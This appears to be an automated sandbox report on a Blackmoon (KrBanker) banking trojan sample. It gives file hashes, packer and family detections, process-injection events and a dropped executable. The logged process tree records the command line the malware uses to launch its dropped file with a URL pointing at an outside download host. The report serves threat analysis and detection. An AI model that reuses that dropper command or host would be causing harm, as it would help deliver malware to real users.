blackmoon | 9fb41fed082d86fcc8b615b5dcd468864f69efbe9be4965788083eb1cdfb6634

Analysis

max time kernel
102s
max time network
132s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
08-04-2023 07:05

Target

9fb41fed082d86fcc8b615b5dcd468864f69efbe9be4965788083eb1cdfb6634.exe
Size

180KB
MD5

c874f6337df1d8205b7972eb329d62a4
SHA1

862f07f883d1804f0cfc557a0017319c1e3d083d
SHA256

9fb41fed082d86fcc8b615b5dcd468864f69efbe9be4965788083eb1cdfb6634
SHA512

d90884fb2e77dd986bacd979330073dbb2daddde7f45187d6f464b88f4cb40fc04f512dbb885df90145eae6d1a189476d1aa24952ef52393c7241be8874f9df0
SSDEEP

3072:UJfyTicyCTvl/iwRtpXTnamb0E2HIIO0FEpzY8NmYvWrEjYzu3aWuIo/3ZJ8fS7Q:U41yclqLmwjTqVNmYv3MzAuIoXkSi39e

Score

10^/10

Blackmoon, KrBanker
Blackmoon also known as KrBanker is banking trojan first discovered in early 2014.
trojan banker blackmoon

Detect Blackmoon payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3548-157-0x0000000000400000-0x000000000044D000-memory.dmp	family_blackmoon

ASPack v2.12-2.42 2 IoCs

Detects executables packed with ASPack v2.12-2.42

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\240567578_lzy.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\240567578_lzy.exe	aspack_v212_v242

Executes dropped EXE 1 IoCs

Processes:

240567578_lzy.exe

pid process

4756 240567578_lzy.exe

pid	process
4756	240567578_lzy.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

Processes:

resource	yara_rule
behavioral2/memory/3548-133-0x0000000000400000-0x000000000044D000-memory.dmp	upx
behavioral2/memory/3548-157-0x0000000000400000-0x000000000044D000-memory.dmp	upx

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

9fb41fed082d86fcc8b615b5dcd468864f69efbe9be4965788083eb1cdfb6634.execmd.exe

description	pid	process	target process
PID 3548 wrote to memory of 1816	3548	9fb41fed082d86fcc8b615b5dcd468864f69efbe9be4965788083eb1cdfb6634.exe	cmd.exe
PID 3548 wrote to memory of 1816	3548	9fb41fed082d86fcc8b615b5dcd468864f69efbe9be4965788083eb1cdfb6634.exe	cmd.exe
PID 3548 wrote to memory of 1816	3548	9fb41fed082d86fcc8b615b5dcd468864f69efbe9be4965788083eb1cdfb6634.exe	cmd.exe
PID 1816 wrote to memory of 4756	1816	cmd.exe	240567578_lzy.exe
PID 1816 wrote to memory of 4756	1816	cmd.exe	240567578_lzy.exe
PID 1816 wrote to memory of 4756	1816	cmd.exe	240567578_lzy.exe

C:\Users\Admin\AppData\Local\Temp\9fb41fed082d86fcc8b615b5dcd468864f69efbe9be4965788083eb1cdfb6634.exe
"C:\Users\Admin\AppData\Local\Temp\9fb41fed082d86fcc8b615b5dcd468864f69efbe9be4965788083eb1cdfb6634.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3548

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c C:\Users\Admin\AppData\Local\Temp\240567578_lzy.exe \url=https://weigo.lanzoui.com/iYP2c0grb3sb
2⤵
- Suspicious use of WriteProcessMemory
PID:1816

C:\Users\Admin\AppData\Local\Temp\240567578_lzy.exe
C:\Users\Admin\AppData\Local\Temp\240567578_lzy.exe \url=https://weigo.lanzoui.com/iYP2c0grb3sb
3⤵
- Executes dropped EXE
PID:4756

C:\Users\Admin\AppData\Local\Temp\240567578_lzy.exe
Filesize
118KB

MD5
c6ed1d777bbd5713c3055885a1c503ca

SHA1
7d6ef82c7c25522f1380a9b1fb79ed7dd2cb98d2

SHA256
bdb8ca18676d4a8c16ad6ff671b19d3834d3f4ab532e4e3e8d3a4de7a7d0fb97

SHA512
e11fa16dd67f6c2d9d6a8266047f743f8beba9c57c0b9615569109156c7c7fac8636872f111cc60450fe782270063c4cbd180b3ab291b912363aba9d420fb8fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\240567578_lzy.exe
Filesize
118KB

MD5
c6ed1d777bbd5713c3055885a1c503ca

SHA1
7d6ef82c7c25522f1380a9b1fb79ed7dd2cb98d2

SHA256
bdb8ca18676d4a8c16ad6ff671b19d3834d3f4ab532e4e3e8d3a4de7a7d0fb97

SHA512
e11fa16dd67f6c2d9d6a8266047f743f8beba9c57c0b9615569109156c7c7fac8636872f111cc60450fe782270063c4cbd180b3ab291b912363aba9d420fb8fd

Download Submit
memory/3548-133-0x0000000000400000-0x000000000044D000-memory.dmp

Filesize
308KB

Download
memory/3548-157-0x0000000000400000-0x000000000044D000-memory.dmp

Filesize
308KB

Download
memory/4756-155-0x0000000000400000-0x000000000046E000-memory.dmp

Filesize
440KB

Download
memory/4756-156-0x0000000000400000-0x000000000046E000-memory.dmp

Filesize
440KB

Download